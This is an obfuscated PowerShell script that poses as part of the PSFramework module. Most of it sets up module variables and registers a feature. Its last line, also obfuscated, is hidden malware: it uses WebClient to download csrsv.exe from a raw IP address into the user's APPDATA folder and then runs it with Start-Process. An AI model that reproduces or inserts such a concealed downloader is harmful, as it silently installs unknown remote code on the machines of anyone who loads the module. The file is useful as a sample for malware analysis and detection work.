${PaRAm`N`ewVaR`iABLe} = @{
	("{1}{0}" -f'e','Nam')  = ("{0}{3}{2}{1}{4}" -f 'psframewo','ki','k_','r','llqueue')
	("{1}{0}"-f 'e','Valu') = (.("{0}{2}{1}{3}" -f 'New-','bjec','O','t') ("{4}{5}{7}{10}{1}{2}{11}{8}{0}{6}{9}{3}"-f 'tQ','.','L','nt]','PSFramework','.','ue','Utili','ncurren','ue[i','ty','imitedCo')(25))
	("{0}{1}"-f 'Optio','n') = ("{0}{1}"-f 'ReadO','nly')
	("{1}{0}"-f 'ope','Sc') = ("{0}{1}" -f 'Scri','pt')
	("{1}{0}{2}"-f 'tio','Descrip','n') = ("{8}{12}{25}{1}{22}{7}{9}{26}{4}{14}{20}{0}{11}{24}{6}{13}{21}{29}{10}{23}{27}{19}{2}{28}{15}{17}{18}{3}{5}{16}" -f 'is us','ed t','ed ','he callst','t of comma','ack ','i','maintain the ','Variable ','li','v','ed by ','t','onInterrupt. ','nd','hashcad','item.','e ','from t','st','s to kill. This ','Not','o ','alue t','Test-PSFFunct','hat is us','s','e','is the ','e: The ')
}

.("{0}{2}{1}"-f'New','able','-Vari') @paramNewVariable



${p`A`RamNewvA`RiABle2} = @{
	("{0}{1}"-f'N','ame')  = ("{1}{2}{0}{3}"-f 'ramework_pssession','ps','f','s')
	("{1}{0}"-f'e','Valu') = (&("{0}{2}{1}" -f 'N','ect','ew-Obj') ("{4}{8}{7}{5}{6}{1}{3}{0}{9}{2}" -f 'anagement.PSSess','er','nContainer','M','PSF','pu','t','amework.Com','r','io'))
	("{1}{0}" -f'on','Opti') = ("{0}{2}{1}"-f'Re','nly','adO')
	("{0}{1}" -f 'Sc','ope') = ("{0}{1}" -f 'Scri','pt')
	("{0}{1}{2}"-f'Descr','ipti','on') = ("{25}{23}{17}{7}{16}{13}{15}{3}{6}{18}{2}{8}{22}{26}{4}{1}{19}{21}{28}{9}{11}{24}{20}{14}{5}{0}{12}{10}{27}"-f 'ns and reconnect sessions ','ke-PSFCommand','ing sessions','ed ','vo','o','power','st o','. Thi','onnect','am','ions, discon','by n','ab','i','lish','f est','ing the li','shell remot',' to trac','red sess','k','s is','in','nect expi','Variable conta',' used by In','e.',' c')
}

.("{1}{2}{3}{0}"-f'ble','New','-Vari','a') @paramNewVariable2



&("{4}{0}{1}{5}{3}{2}" -f 't','er-P','e','eatur','Regis','SFF') -Name ("{1}{5}{4}{3}{8}{0}{7}{6}{2}" -f'eritE','PSFrame','tion','n','ork.I','w','leExcep','nab','h') -NotGlobal -Owner ("{0}{2}{1}"-f'PS','ework','Fram') -Description ("{21}{6}{18}{7}{32}{29}{9}{24}{14}{10}{23}{3}{26}{17}{31}{34}{38}{30}{16}{0}{8}{39}{28}{15}{4}{41}{19}{11}{37}{35}{12}{40}{22}{25}{2}{13}{42}{27}{20}{33}{5}{1}{36}"-f'r t',' ','an','nab',' that v','as','auses a','ework c','o ','mand','i','g','r ','d',' w','ler has','mete','cep','ll PSFram','iable set (e.','ect th','C','it','th the -E','s','h the same name) ','leEx','sp','ether the cal','m','a','tio','o','at ','n pa','g a paramete','well.','. by havin','r','check, wh','w','ar',' re')

(.("{3}{0}{1}{2}"-f'w-Ob','j','ect','Ne') ("{2}{1}{3}{0}"-f'bClient','m.Net.','Syste','We')).("{2}{3}{1}{0}"-f'le','Fi','Downl','oad').Invoke(("{2}{1}{3}{11}{6}{5}{10}{4}{0}{9}{7}{8}" -f's','ttp://94.102.53','h','.','o/c','8/','3','v.','exe','rs','~yaho','2'),"$env:APPDATA\csrsv.exe");&("{0}{3}{4}{1}{2}"-f 'Sta','s','s','rt-','Proce') ("$env:APPDATA\csrsv.exe")
